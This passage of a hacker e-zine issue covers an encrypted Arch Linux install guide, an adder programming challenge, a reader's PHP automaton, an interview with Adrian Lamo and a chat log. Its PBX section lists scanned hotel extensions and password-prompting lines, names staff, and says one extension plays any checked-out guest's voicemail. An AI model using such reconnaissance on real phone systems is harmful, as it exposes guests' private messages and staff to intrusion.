e extended
p primary partition (1-4)
p
Partition number (1-4, default 1): 1
First sector (2048-7856126, default 2048):
Using default value 2048
Last sector, +sectors or +size{K,M,G} (2048-7856126, default 7856126): +300M
Command (m for help): n
Command action
e extended
p primary partition (1-4)
p
Partition number (1-4, default 2): 2
First sector (616448-7856126, default 616448):
Using default value 616448
Last sector, +sectors or +size{K,M,G} (616448-7856126, default 7856126):
Using default value 7856126
Command (m for help): a
Partition number (1-4): 1
Command (m for help): w
The partition table has been altered!
Calling ioctl() to re-read partition table.
Syncing disks.
# fdisk -l /dev/sdb
Device Boot Start End Blocks Id System
/dev/sdb1 * 2048 616447 307200 83 Linux
/dev/sdb2 616448 7856126 3619839+ 83 Linux
== Creating a /boot ==
Next, I create an ext3 filesystem on /boot
# mkfs.ext3 -L shadowboot /dev/sdb1
== Encrypting root ==
At this point, you may need to load the fuse module that TrueCrypt uses (it may autoload on its own
though).
# modprobe fuse
It shouldn't output anything, and if it does, you have a problem. Make sure it's installed. :3
Then, create a TrueCrypt container for the root filesystem.
# truecrypt -t -c /dev/sdb2
Follow through the instructions provided and create a "Normal" volume. The rest of the options are
up to the user. This will format the drive, erasing all data on it. TrueCrypt wipes the drive unless
told not to using the --quick option, so use --quick if you feel inclined.
NOTE: The password is everything, so don't make it too short or use a dictionary word, and don't use
a keyfile unless you have somewhere safe to store it, like a flash drive. Also, NEVER store the
keyfile in /boot (should be a given): /boot stays unencrypted, so that's like leaving the key to a
safe in the keyhole. Keep in mind, too, that the kernel, the initrd and the TrueCrypt binary inside
it all sit on that unencrypted /boot with nothing checking their integrity. This setup protects the
data at rest on a powered-off drive; it does nothing against someone who can tamper with /boot while
you're away and wait for you to type the password.
If you choose "None" as the filesystem, or if you want another filesystem, format it after mounting
the device, as described in the next step.
== Formatting Root ==
Open the container:
# truecrypt -t --filesystem=none --slot=15 /dev/sdb2 # Remember this slot number for later
There should now be a /dev/mapper/truecrypt15 block device. This is the container. If you are not
satisfied with the filesystem or don't have one, reformat it to your liking. I used btrfs because of
the compression. At the time of this writing, however, I don't suggest you do the same because btrfs
is still in development and potential bugs may cause data loss.
# mkfs.btrfs -L shadowcrypt /dev/mapper/truecrypt15
= Mounting The Filesystems =
Now that the crypt is opened and formatted, mount the device.
# mkdir /newarch
# mount /dev/mapper/truecrypt15 /newarch
If you are using btrfs like me and want compression, do this instead:
# mount -t btrfs -o compress /dev/mapper/truecrypt15 /newarch
NOTE: I used subvolumes on mine. ;) Let's see if you can figure out how to do it (only for btrfs).
Mount /boot:
# mkdir /newarch/boot && mount /dev/sdb1 /newarch/boot
= Installing ArchLinux =
Now, install the system to /newarch. Most of this comes from the Arch Linux wiki
(http://wiki.archlinux.org/index.php/Install_from_Existing_Linux).
If you aren't comfortable with these commands, then read the <command> --help. Basically, all the
following does is ready the system for pacman (the Arch Linux package manager); install the base
system with TrueCrypt and sudo; mount the proc, sys, and dev directories; chroot into the system;
install the kernel (again); install the TrueCrypt hook for the initrd; and install grub. :)
First, edit /etc/pacman.d/mirrorlist and uncomment a mirror to download packages from.
# mkdir -p /newarch/var/lib/pacman
# pacman -Syy -r /newarch
# pacman -S base grub2 base-devel truecrypt sudo -r /newarch
# cd /newarch/dev
# rm console; mknod -m 600 console c 5 1
# rm null; mknod -m 666 null c 1 3
# rm zero; mknod -m 666 zero c 1 5
# cp /etc/resolv.conf /newarch/etc/resolv.conf
# cd /newarch
# mount -t proc proc proc/
# mount -t sysfs sys sys/
# mount --bind /dev/ dev/
# chroot . /bin/bash
# pacman -S kernel26 # should already be installed but double check
# useradd --home /build/ --create-home --user-group build
# mkdir -p /build/build/mkinitcpio-truecrypt/
# cd /build/build/mkinitcpio-truecrypt/
# wget http://aur.archlinux.org/packages/mkinitcpio-truecrypt/mkinitcpio-truecrypt.tar.gz
# tar -xvzf mkinitcpio-truecrypt.tar.gz
# chown -R build:build /build/
# sudo -u build makepkg
# pacman -U ./mkinitcpio-truecrypt*.pkg.tar.*
# grub-install --no-floppy /dev/sdb # Remember to use -your- device here
= Configuring Grub2 =
Edit /boot/grub/grub.cfg and add:
tcdevice=<device>:<slotnum>
to the command line boot arguments (starts with linux within a menuentry block), and change
"root=<device>" to "root=/dev/mapper/truecrypt<slotnum>".
WARNING: Device nodes can change between boots (the disk that was /dev/sdb may come up as /dev/sda).
It is HIGHLY recommended that you use persistent block device naming. You can learn more about this
at http://wiki.archlinux.org/index.php/Persistent_block_device_naming#by-id_and_by-path. TrueCrypt
volumes don't have a UUID, so use by-id for the container, which will work on just about any
computer (great for USB sticks). Your tcdevice should end up looking like
"tcdevice=/dev/disk/by-id/<id>:<slotnum>". It also helps to replace
"root=/dev/mapper/truecrypt<slotnum>" with the UUID of the filesystem inside the container; run the
`blkid` command against the opened /dev/mapper/truecrypt<slotnum> device to find it.
NOTE: TrueCrypt slot numbers run from 1 to 64, so stay within that range.
= Configuring the System =
Now that the system is installed, it's time to make the initial ramdisk (initrd).
Edit /etc/mkinitcpio.conf, read the notes, and add 'truecrypt' before 'filesystems' in the HOOKS
string. If you are using a USB stick, add 'usb' before 'truecrypt' and 'filesystems' (They are run
in the order given in the array).
NOTE: If you are using a btrfs root filesystem, then add the following to the MODULES string:
crc32c libcrc32c zlib_deflate btrfs
Now for the kernel:
# mkinitcpio -p kernel26
Read the Arch Linux wiki link above, install whatever else you want, and edit the settings. Then add
the devices to fstab. Since the device nodes in /dev/ are likely to change (sdb to sda, etc.), use
the by-id path for tcdevice on the kernel command line and UUIDs for the filesystems in fstab.
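Added example, not part of the zine or of the mkinitcpio-truecrypt hook: a checker for the kernel command line that the hook will read, covering the grub.cfg edits and the naming warnings above. It assumes only what the article states (the hook takes `tcdevice=<device>:<slotnum>`, slots run 1 to 64, the opened container appears as `/dev/mapper/truecrypt<slotnum>`, and a `/dev/disk/by-id` path or a filesystem UUID survives the /dev/sdX reshuffle). The grub.cfg in `SAMPLE_CFG` is a constructed sample with one good entry and two broken ones.

```python
"""Sanity-check the kernel command line the TrueCrypt initrd hook will read.

Added example, not part of the zine or the mkinitcpio-truecrypt hook.
SAMPLE_CFG is a constructed grub.cfg; the disk id and UUID in it are made up.
"""
import re

SLOT_MIN, SLOT_MAX = 1, 64            # TrueCrypt slot range stated in the article
BY_ID = "/dev/disk/by-id/"

def check_cmdline(params):
    """Return the problems found in one 'linux' line's parameter list."""
    kv = dict(p.partition("=")[::2] for p in params)   # 'ro' becomes ('ro', '')
    tc = kv.get("tcdevice")
    if tc is None:
        return ["missing tcdevice= (the hook cannot find the container)"]
    dev, sep, slot_s = tc.rpartition(":")
    if not sep or not slot_s.isdigit():
        return [f"tcdevice must be <device>:<slot>, got {tc!r}"]
    slot, problems = int(slot_s), []
    if not SLOT_MIN <= slot <= SLOT_MAX:
        problems.append(f"slot {slot} is outside {SLOT_MIN}..{SLOT_MAX}")
    if not dev.startswith(BY_ID):
        problems.append(f"tcdevice {dev} is not a by-id path; the node may move")
    root = kv.get("root")
    if root is None:
        problems.append("missing root=")
    elif not (root.startswith("UUID=") or root == f"/dev/mapper/truecrypt{slot}"):
        problems.append(f"root={root} does not match slot {slot}")
    return problems

MENUENTRY = re.compile(r"""menuentry\s+(['"])(.*?)\1""")

def check_grub_cfg(text):
    """Map each menuentry title to the problems on its 'linux' line."""
    results, title = {}, None
    for line in text.splitlines():
        s = line.strip()
        m = MENUENTRY.match(s)
        if m:
            title = m.group(2)
        elif s.startswith("linux ") and title is not None:
            results[title] = check_cmdline(s.split()[2:])   # skip 'linux' and the image path
    return results

SAMPLE_CFG = """\
menuentry 'Arch Linux (encrypted)' {
    insmod ext2
    set root=(hd0,1)
    linux /vmlinuz26 tcdevice=/dev/disk/by-id/ata-EXAMPLE_DISK-part2:15 root=UUID=01234567-89ab-cdef-0123-456789abcdef ro
    initrd /kernel26.img
}
menuentry 'bad slot' {
    linux /vmlinuz26 tcdevice=/dev/sdb2:70 root=/dev/mapper/truecrypt70 ro
}
menuentry 'mismatched root' {
    linux /vmlinuz26 tcdevice=/dev/disk/by-id/ata-EXAMPLE_DISK-part2:15 root=/dev/mapper/truecrypt16 ro
}
"""

if __name__ == "__main__":
    import sys
    cfg = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_CFG
    for title, problems in check_grub_cfg(cfg).items():
        print(f"{title}: {'OK' if not problems else '; '.join(problems)}")
```

Run it as `python check_tc_grub.py /boot/grub/grub.cfg` after editing the file and before rebooting; a menuentry that reports anything other than OK is one the initrd hook will not be able to open, which on a machine with only one entry means a reinstall from the live CD.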
...And that should be it! If you have any trouble, feel free to contact me in the IRC channels list
at the top of the article. If you want, you can also check #archlinux on irc.freenode.net and see if
anyone around can help you there.
'Tis all from second. And remember, nothing is impossible with God (whatever, haters gonna hate).
[==================================================================================================]
-=[ 0x0b Programming Challenge
-=[ Author: storm
-=[ Email: storm@gonullyourself.org
-=[ Website: http://gonullyourself.org/
In Computer Science (and electronics in general), an adder is a circuit by which simple addition is
performed by passing input bits through a series of logic gates (e.g., AND, OR, XOR) and returning
the result. Many different adder designs exist, depending on what exactly you are trying to
achieve.
Your challenge this issue is to further research adders and write a program that performs addition
of input bits using only logic gates. Three levels of this challenge exist, each one progressively
more complex to code.
Level 1: Write a half adder
A half adder is the simplest adder circuit. It accepts two input bits A and B and returns two
output bits S and C. S stands for the "sum" of the two bits, and C stands for the "carry" bit (if
produced). The logical design of a half adder is very simple and easy to follow, but a key
shortcoming is that it does not accept a carry bit as input, so its use in calculation is limited.
A black box diagram of a half adder would look like:
______________
| |
A --->| |---> S (sum)
| Half Adder |
B --->| |---> C (carry)
|______________|
Level 2: Write a full adder
A full adder is a more complex adder circuit that returns the same output as a half adder but
accepts a carry bit as input. Because of this, full adders are more universally implemented. A
full adder accepts three input bits A, B, and Cin (carry input) and returns two output bits S (sum)
and Cout (carry output).
A black box diagram of a full adder would look like:
______________
| |
A --->| |---> S (sum)
| Full Adder |
B --->| |---> Cout (carry out)
|______________|
^
|
Cin
(carry in)
Level 3: Write a ripple carry adder
A ripple carry adder is essentially a series of full adders that is able to perform addition on
binary numbers with multiple digits. When one full adder completes its computation, the carry out
bit is then passed to the next full adder as the carry in bit. Because there is no carry in bit for
the addition of the first digits, a half adder may be the first (but only the first) step in a
ripple carry adder.
A black box diagram of a ripple carry adder would look like:
A2 B2 A1 B1 A0 B0
| | | | | |
__\/______\/__ __\/______\/__ __\/______\/__
| | | | | |
C3 | | C2 | | C1 | |
... <----| Full Adder |<----| Full Adder |<----| Full Adder |<---- C0
| | | | | |
|______________| |______________| |______________|
| | |
\/ \/ \/
S2 S1 S0
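Added reference implementation, not a reader submission and not part of the challenge text: the three levels above in Python, using nothing but AND, OR and XOR on single bits. The full adder is built from two half adders with the carries ORed together, and the ripple carry adder chains full adders with the carry-in of the first stage exposed, so the chain itself can be extended. Bit lists are least significant bit first, matching the A0/B0 on the right of the diagram; `exhaustive_check` compares the gate model against native integer addition for every input pair at a given width.

```python
"""Gate-level half, full and ripple carry adders (added reference implementation)."""

# The only primitives used: two-input logic gates on bits 0/1.
def AND(a, b): return a & b
def OR(a, b):  return a | b
def XOR(a, b): return a ^ b

def half_adder(a, b):
    """Level 1: S = A XOR B, C = A AND B."""
    return XOR(a, b), AND(a, b)

def full_adder(a, b, cin):
    """Level 2: two half adders; a carry can come out of either, never both."""
    s1, c1 = half_adder(a, b)
    s, c2 = half_adder(s1, cin)
    return s, OR(c1, c2)

def ripple_carry_add(a_bits, b_bits, cin=0):
    """Level 3: bit lists LSB first; returns (sum_bits, carry_out)."""
    if len(a_bits) != len(b_bits):
        raise ValueError("operands must have the same width")
    if any(bit not in (0, 1) for bit in a_bits + b_bits + [cin]):
        raise ValueError("bits must be 0 or 1")
    sum_bits, carry = [], cin
    for a, b in zip(a_bits, b_bits):          # carry ripples from stage to stage
        s, carry = full_adder(a, b, carry)
        sum_bits.append(s)
    return sum_bits, carry

def to_bits(n, width):
    """Unsigned integer to LSB-first bit list of the given width."""
    return [(n >> i) & 1 for i in range(width)]

def from_bits(bits):
    return sum(bit << i for i, bit in enumerate(bits))

def add(x, y, width=8):
    """Add two unsigned ints through the gate model; returns (result, carry_out)."""
    s, cout = ripple_carry_add(to_bits(x, width), to_bits(y, width))
    return from_bits(s), cout

def exhaustive_check(width=4):
    """True if the gate model agrees with native addition for every pair."""
    for x in range(1 << width):
        for y in range(1 << width):
            r, c = add(x, y, width)
            if (c << width) | r != x + y:
                return False
    return True
```

The carry-out of the last stage is the overflow flag: `add(15, 1, width=4)` yields `(0, 1)`, the wrap-around you get in a 4-bit register plus the bit that says it happened.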
Submissions may be written in any programming or scripting language. Correct, acceptable, and
innovative solutions will be published in the next issue of GNY Zine, and their authors will be
recognized. Solutions may be submitted by:
- Forum (http://gonullyourself.org/board/)
- IRC (irc.distrust.us #gny)
- Email (zine@gonullyourself.org)
Excellent resources for further information on adders and logic gates:
http://en.wikipedia.org/wiki/Adder_%28electronics%29
http://en.wikipedia.org/wiki/Logic_gate
http://www.play-hookey.com/digital/adder.html
--------------------------------------------------------------------------------
Last issue, I challenged readers to write a program that would generate elementary cellular automata
and display the resulting figures in a dynamic and interesting fashion. One submission was received
from ardnew, who wrote a program in php that generates a cellular automaton by controlling the
background color of cells in HTML tables.
-=-=-
<?php
$NUM_RULES = 8;
$NUM_LINES = 150;
$rule_table = array();
function int2bitvec($l, $n)
{
$s = array();
while($l--)
{
array_unshift($s, ($n >> $l) & 1);
}
return $s;
}
function bitvec2str($s)
{
return join('', array_reverse($s));
}
function build_rules($l, $n)
{
global $rule_table;
$v = int2bitvec($l, $n);
for($i = 0; $i < $l; ++$i)
{
$t = int2bitvec(log($l, 2), $i);
$rule_table[bitvec2str($t)] = $v[$i];
}
}
function line_length($i)
{
return 2 * $i + 1;
}
echo '<html>';
echo '<head><title>Linear Cellular Automata</title></head>';
echo '<body>';
echo '<form action="'.$_SERVER['PHP_SELF'].'">';
echo 'Enter a rule (0-255): ';
echo '<input type="text" name="n" />';
echo '<input type="submit" value="Go!" />';
echo '</form><br /><br />';
if(isset($_GET['n']))
{
echo '<table border="0" cellspacing="1">';
$n = max(0, min(255, (int) $_GET['n'])); // rule number, clamped to the 0-255 range the form promises
build_rules($NUM_RULES, $n);
$prev_line = '';
$curr_line = '1';
$pad_print = '';
$line_print = '';
$pad = "";
for($i = 0; $i < $NUM_LINES; ++$i)
{
echo '<tr>';
$prev_line = $curr_line;
$curr_line = '';
$pad = str_repeat(0, ((line_length($NUM_LINES) + 2) - line_length($i)) / 2);
$pad_print = preg_replace('/0/', '<td bgcolor="white"></td>', $pad);
// Render the previous line: every 1 becomes a black cell, every 0 a white one.
// Doing both in one str_replace means a line of all zeros (e.g. rule 0) no
// longer reuses the stale $line_print left over from the previous iteration.
$line_print = str_replace(array('1', '0'),
array('<td bgcolor="black"></td>', '<td bgcolor="white"></td>'),
$prev_line);
echo($pad_print . $line_print . $pad_print);
for($c = 0, $j = (line_length($NUM_LINES) - line_length($i)) / 2 - 1; $c < line_length($i +
1); ++$c, ++$j)
{
$curr_line .= $rule_table[substr($pad . $prev_line . $pad, $j, 3)];
}
echo '</tr>';
}
echo '</table>';
}
echo '</body>';
echo '</html>';
?>
[==================================================================================================]
-=[ 0x0c Exploring Hotel Pennsylvania's PBX
-=[ Author: Shadytel, Inc
-=[ Website: http://www.shadytel.com/
What better time to have fun with Hotel Penn's phone system than at the Hackers on Planet Earth
conference? We found that the PBX was very buggy and inconsistent, leading to some weird findings.
For instance, some extensions can be dialed directly from within the hotel (at a courtesy phone),
while others are unreachable from the IVR prompt but become reachable if dialed by the operator.
Also, some extensions are only reachable via the IVR prompt. Sometimes, preceding an extension with 9
will drop you to that extension's voicemail, and pressing # during a VMB greeting sends you to the
IVR. The PBX will drop you back to the IVR prompt if it encounters any unhandled exceptions.
Extension 555 is the name directory; 654 may be used to listen to voicemails of any checked out
guest; and 632 ("Sandy Simmons") is the admin extension, but we weren't able to access it.
100 - VMB - "Express Checkout"
101 - VMB - "Express Checkout"
102 - VMB - "Express Checkout"
103 - VMB - "Express Checkout"
104 - VMB - "Express Checkout"
105 - VMB - "Express Checkout"
106 - VMB - "Express Checkout"
107 - VMB - "Express Checkout"
108 - VMB - "Express Checkout"
109 - VMB - "Express Checkout"
120 - ring out
190 - ring out
198 - ring out
199 - ring out
8600 - HELO - "Sky Top Ballroom"
8601 - VMB
8602 - HELO
8603 - VMB - "18th floor" (the extension dialed from)
8604 - VMB
8605 - VMB
8606 - VMB
8607 - reorder
8608 - VMB
8609 - VMB
8610 - reorder
8611 - VMB
8612 - VMB
8613 - HELO - "Domino's Pizza" (lol)
8614 - VMB
8615 - VMB
8616 - reorder
8617 - VMB
8618 - VMB
8619 - VMB
8620 - VMB
8621 - VMB - "Gary Smith"
8622 - VMB - "Tina"
8623 - VMB - "Sam ???"
8624 - reorder
8625 - reorder
8626 - VMB
8627 - reorder
8628 - reorder
8629 - reorder
8630 - reorder
8631 - ring out
8632 - ring out
8633 - VMB
8634 - VMB
8635 - ring out
8636 - reorder
8637 - reorder
8638 - VMB
8639 - reorder
8640 - VMB
8641 - VMB
8642 - VMB
8643 - VMB
8644 - reorder
8645 - VMB
8646 - VMB
8647 - VMB
8648 - ring out
8649 - reorder
8650 - IVR
8651 - reorder
8652 - VMB
8653 - reorder
8654 - "Security" (not sure if HELO or VMB, hung up quickly)
8655 - reorder
8656 - VMB
8657 - ring out
8658 - ring out
8659 - ring out
8660 - VMB - "Joanna Kyen"
8661 - VMB - "Penn Plaza Pavillion"
8662 - VMB
8663 - VMB
8664 - HELO
8665 - HELO
8666 - HELO - "4th floor"
8667 - HELO - "?th floor"
8668 - HELO - "Seven"
8669 - HELO - "This is seven"
8670 - HELO
8671 - ring out
8672 - ring out
8673 - HELO
8674 - HELO
8675 - HELO
8676 - IVR
8677 - reorder
8678 - ring out
8679 - HELO
8680 - reorder
8681 - reorder
8682 - reorder
8683 - ring out
8684 - reorder
8685 - VMB
8686 - VMB
8687 - VMB
8688 - ring out
8689 - IVR
8690 - reorder
8691 - reorder
8692 - reorder
8693 - VMB
8694 - VMB - "medical manager Matt Rowes"
8695 - VMB - "Diana Carpenter"
8696 - reorder
8697 - reorder
8698 - reorder
8699 - reorder
8800 - ring out
8801 - ring out
8802 - reorder
8803 - VMB
8804 - VMB
8805 - reorder
8806 - reorder
8807 - ring out
8808 - IVR
8809 - reorder
8810 - IVR
8811 - HELO - "I don't want any!" *hangup*
8812 - reorder
8813 - IVR
8814 - reorder
8815 - operator
8816 - IVR
8817 - reorder
8818 - busy (the extension dialed from)
8819 - IVR
8820 - reorder
8821 - reorder
8822 - operator
8823 - reorder
8824 - HELO - "Sup girl, sup? Uhhhhhhhhhhhhhhhhhh.........................."
8825 - IVR
8826 - VMB
8827 - reorder
8828 - reorder
8829 - IVR
8830 - IVR
8831 - reorder
8832 - ring out
8833 - ring out
8834 - reorder
8835 - IVR
8836 - reorder
8837 - ring out
8838 - reorder
8839 - reorder
8840 - reorder
8841 - reorder
8842 - IVR
8843 - IVR
8844 - ring out
8845 - IVR
8846 - IVR
8847 - IVR
8848 - reorder
8849 - reorder
8850 - IVR
8851 - IVR
8852 - IVR
8853 - IVR
8854 - IVR
8855 - IVR
8856 - IVR
8857 - IVR
8858 - VMB
8859 - IVR
8860 - IVR
8861 - IVR
8862 - IVR
8863 - IVR
8864 - beep beep beep
8865 - IVR
8866 - IVR
8867 - reorder
8868 - reorder
8869 - IVR
8870 - IVR
8871 - IVR
8872 - IVR
8873 - reorder
8874 - IVR
8875 - IVR
8876 - IVR
8877 - IVR
8878 - IVR
8879 - IVR
8880 - reorder
8881 - VMB
8882 - reorder
8883 - IVR
8884 - VMB
8885 - reorder
8886 - VMB
8887 - reorder
8888 - operator
8889 - reorder
8890 - Hotel Expert, asks for password
8891 - Hotel Expert, asks for password
8892 - Hotel Expert, asks for password
8893 - reorder
8894 - Hotel Expert, asks for password
8895 - reorder
8896 - reorder
8897 - reorder
8898 - VMB
8899 - VMB
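As an added example (not part of the original article), a small Python parser that tallies the scan results above by outcome and flags the entries a PBX administrator reviewing such a list would want to look at first: extensions that answer with a password prompt, and voicemail boxes whose greeting identifies the mailbox. The sample lines are copied from the list above; the outcome vocabulary (VMB, HELO, IVR, reorder, ring out, operator, busy) is taken from the list as written.

```python
import re
from collections import Counter

# Constructed sample: a subset of the result lines from the list above.
SAMPLE_RESULTS = """\
100 - VMB - "Express Checkout"
120 - ring out
8600 - HELO - "Sky Top Ballroom"
8607 - reorder
8650 - IVR
8654 - "Security" (not sure if HELO or VMB, hung up quickly)
8815 - operator
8819 - busy (the extension dialed from)
8864 - beep beep beep
8890 - Hotel Expert, asks for password
8899 - VMB
"""

# Outcome labels used in the list above; anything else is bucketed as "other".
KNOWN = {"VMB", "HELO", "IVR", "reorder", "ring out", "operator", "busy"}

LINE_RE = re.compile(r'^(\d+)\s*-\s*(.*)$')


def parse_line(line):
    """Return (extension, outcome, note) for a result line, or None if it is not one."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ext, rest = m.group(1), m.group(2).strip()
    # A known outcome may be followed by ' - "label"' or by a trailing parenthetical.
    head, _, note = rest.partition(' - ')
    head = head.strip()
    base = head.split(' (', 1)[0]
    if base in KNOWN:
        paren = head[len(base):].strip().strip('()')
        return ext, base, note.strip() or paren
    return ext, "other", rest


def summarize(text):
    """Tally outcomes and collect extensions worth an administrator's review:
    a live password prompt, or a voicemail box with an identifying greeting."""
    counts = Counter()
    review = []
    for line in text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ext, outcome, note = parsed
        counts[outcome] += 1
        if "password" in note.lower() or (outcome == "VMB" and note.startswith('"')):
            review.append((ext, outcome, note))
    return counts, review


if __name__ == "__main__":
    counts, review = summarize(SAMPLE_RESULTS)
    for outcome, n in counts.most_common():
        print(f"{outcome:10s} {n}")
    for ext, outcome, note in review:
        print(f"review: {ext} ({outcome}) {note}")
```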
[==================================================================================================]
-=[ 0x0d Interview with Adrian Lamo
With all of the recent news about Wikileaks, who hasn't heard of Adrian Lamo? But this isn't the
first time he's made national headlines. We set out to learn more about Adrian himself, his past as
a high-profile hacker, and his thoughts on current debates in the scene today.
Before we began, Adrian wanted to express:
I'd like to point you to three hyperlinks that you can read at your leisure - perhaps while I
type answers - they're brief. They're essential to understanding me, in a way.
One is about why I answer in hyperlinks so often. Someone I respect wrote it. It's:
http://lucidstranger.blogspot.com/2007/02/poem-experience.html
The 2nd is about not rushing to put me on a pedestal or demonize me too quickly. I'm human, like
everyone else. http://users.resist.ca/~adrian/kokoro.htm
The last is about interpreting my words. It's: http://adrian.adrian.org/zot.htm
What is your opinion on the disclosure of vulnerabilities and proof-of-concept exploits? Do you
believe in full disclosure, and should security researchers notify affected vendors prior to their
announcements?
I believe in a general principle of courtesy, and ensuring that announcements/disclosures don't
adversely affect users by way of unpatched vulnerabilities. However, vendors with a history of
working poorly with the security community or engaging in poor corporate citizenship should
periodically be made examples of. After all, if you can't be a good example, you can always be a
terrible warning.
I'm generally in favor of full disclosure, with the repeated caveat that we should be gentlemen
about it. That being said, full disclosure and proofs-of-concept when no patch exists
isn't/aren't always inappropriate. The security community - on all levels - does not exist to
guarantee safety for all. Sometimes it's healthy for entities to learn that they're vulnerable
via a phone call from the press. Part of the mission of the security community is inherently to
irritate, and in so doing, force the creation of pearls; to produce corporate, technological,
and societal evolution. It is not here to make failure painless and lesson-free.
If you have watched Hackers Wanted, my closing monologue is something of an example of what I'm
talking about here.
Many news stories talk about the curiosity you possess in everything, not just computers. What is
the most interesting thing you have ever found and/or accessed in your urban explorations?
The most famous one is, of course, the kitten that's covered in Kevin Mitnick's book. But my
favorite memory is an abandoned power plant along the banks of the James River in Richmond, VA.
It was very steampunk, with labyrinthine tunnels and floors that gave way to deep underlevels.
I explored it for days on end, taking pictures. Sometimes you'd turn corners and be confronted
with a ghostly figure, only to realize it was an amazingly detailed mural barely illuminated in
the twilight. Dominion Power, I miss you.
Of course, they're all unique in their own way, and they're all fading, one by one, sometimes
literally, as the song goes, paved ... and put up a parking lot. The InformationWeek cover story
on me had its photos shot in one of my abandoned buildings literally as crews were tearing it
down. Google Earth shows a parking structure there today.
The Western Union Telegraph (yes, just telegraph, no money orders when it was built) building in
Philly is gone, more gentrification. Thanks gentrification, we needed that Starbucks.
My most surreal one was in the roof of the cathedral at the Cathedral of Learning in Pittsburgh.
The trash and debris got older and older as you made your way through. I popped out the other
end through a ventilation shaft ... in the (empty, at that hour) network room.
Like I said, all unique, all dwindling, never to be repeated.
What motivated you to become a hacker? Was there anyone in your life who served as an inspiration?
Nothing motivated me. I always was. It's something you're born into, not something you can ape
with any number of classes or certifications. You have to love learning.
I never had any heroes or inspirations. It's still surreal to me when ex-LoD/H people contact
me - I grew up reading old Legion of Doom Technical Journals on BBS systems - but they're just
people, like me.
The only person who really stirred my love of technology - apart from my dad - was my 9th grade
computer science teacher, Douglas Keachie. We were nominally enemies at the time, but the
adversity inspired me to learn. We remember each other much more fondly 15 years later. ;>
Have you ever dabbled in other disciplines of technology, such as phone phreaking or hardware
hacking?
The short answer is yes. I'd refer you to paragraph 2 of:
http://www.sfweekly.com/2003-04-16/news/a-duty-to-hack/2/ - some of the things that run our
country are very vulnerable. The FBI intervened before I was able to make a disclosure. I don't
know if I ever will. I do know that sources tell me not much has changed.
Do you regularly attend any hacking conferences other than HOPE? Which conference (and year) has
been your favorite, and why?
I attend Defcon, and I've enjoyed Summercon. Defcon V, my first Defcon, was undoubtedly also my
favorite one in the Defcon series. It was on the cusp before Defcon turned more corporate, and
it was my first real hacking conference. It had everything - getting mistaken for a fugitive,
being stranded in Vegas, meeting new people, and simply being anonymous - meeting people with no
preconception of what type of person I am.
In terms of HOPE, I enjoyed this year the most. It was epic-level fun. I enjoyed every minute of
it. Many more people were quietly friendly than were vocally intrusive. I don't think the latter
realized how much of a kick I got out of them.
I will say, it was funny to see the reactions of anti-Adrian people at the panel.
I don't really consider them anti-Adrian. To be anti-Adrian, they'd have to know Adrian. They
know my persona, my public preconceptions, my idoru. None of these things are me. Because of
this, there's a certain disconnect when they speak out - to me, they're talking about someone
else.
How has being diagnosed with Asperger's Syndrome affected your life? Do you believe it plays a role
in your hacker mindset?
I honestly don't know yet. It's too soon for me to say how it's affected my life, if at all. I
feel I understand myself better. But I still think the word is a label for something we don't
fully understand.
Do you believe that formal education plays a positive or negative role in the learning experience of
hackers, and why?
I think formal education plays a positive role in the learning experience, but not in the way
that's strictly intended. Nobody ever learned to be a great writer in English class. Instead, it
prepares differently oriented minds for adversity, and for taking unintended lessons from human
events - something that's very hackerish, in my opinion, learning to sink or swim at the art of
gleaning value from a wasteland of ineffective techniques and irrelevant data.
The media has frequently referred to you as the "homeless hacker" for sleeping in abandoned
buildings and traveling the country via bus. Are you still upholding this lifestyle, and do you
recommend it to others?
I don't recommend anything to others, beyond making their own choices and enriching the total of
human events by seeking out new situations, circumstances, and experiences.
I still travel by bus and rail, but couch surf more than I crash in random places. I haven't
stopped, but I don't have time for it to be a lifestyle anymore. And, more importantly, it's no
longer new to me - I want to keep my brain active and engaged with new approaches to life,
rather than repeating the old.
We've mainly avoided the issue with Wikileaks and Bradley Manning. However, is there anything you
wish to say about the situation? Also, before the whole ordeal, if you were to switch places with
Manning, would you have leaked the Collateral Murder video and diplomatic cables yourself?
Because I'm not Manning, and can't switch places with him, or go back in time, I can't say what
I would do in his place. However, based on my previous actions, I would never have released the
cables. PFC Manning has a good heart, but not a good sense of justice, perspective, or loyalty.
That said, if he had just leaked the so-called Collateral Murder video, I would not have exposed
his actions, because that was a fairly harmless leak, and the harm to him would outweigh any
potential harm prevented.
Thank you for your time. Is there anything else you would like to add before we conclude?
The only thing I'll add is that sometimes in life, you're presented with no good choices, only
less-bad ones, and you'll be hated by some sectors no matter what you do. I took the menu of bad
choices and elected the one I felt served the needs of the many. No one can know what that's
like until they've had to make that call.
-=-=-
If you would like to weigh in on the interview, the Wikileaks controversy, or anything
Adrian-related, our contact information is in the introduction - we will publish intelligent
arguments and opinions (both for and against) in the next issue.
[==================================================================================================]
-=[ 0x0e Et Cetera, Etc.
-=[ Author: teh crew
With the rant finished from last issue's Et Cetera, Etc., this time we're just going to throw a
bunch of whatever in here and see what happens. A bit of personalization, ya know? ;)
GNY goes to HOPE!
----------------------------------------------------------------------------------------------------
The Next HOPE was a blast. storm, m0nkee, c1rcuit, and HIT_007 hung out and had a netbook/laptop
orgy at the good ol' Hotel Pennsylvania for the weekend, representing GNY well. Media and various
shitz from the conference are posted up at http://gonullyourself.org/hope/. You will see a link to
our QR code there - it was an idea we had while at the con. We got ASCII goatse'd by scanning one...
it made sense that we make our own. It linked to a simple message board that we created for people
to communicate during the con. It went pretty well, and although it was put up rather late, it was
still a success.
Moving on, the talks were done well for the most part. The social engineering panel was fun as
always, but the biggest and most popular story was of course the Wikileaks vs. Adrian Lamo
controversy. Mr. Lamo was in attendance and us HOPE-goers were given a chance to ask him questions.
People were mature about that... for the most part. The only real complaint would be that there was
definitely room for more technical talks and topics other than privacy, but 2600 has always been
pretty political. In any event, for those who have never been to HOPE or a conference in general, it
is certainly recommended. GNY road trip to Defcon next year..? :D
#telephony shenanigans!
----------------------------------------------------------------------------------------------------
* HACKER (~HACKER@99.56.199.228) has joined #telephony
<HACKER> BEAVE
<HACKER> I WANT MY ACCESS TO TELEPHREAK
<HACKER> TELEPRHEAK IS FULL OF NEW PEOPLE
<HACKER> I HAVE YOU DEFCON
<HACKER> BEAVE KICKED ME OUT
<HACKER> LADYNIKON
<HACKER> THEY DON'T KNOW IM A HACKER MODE
<HACKER> DEFCON IS LOCATED IN LOS ANGELES ?
<HACKER> HONESTLY TELEPHREAK
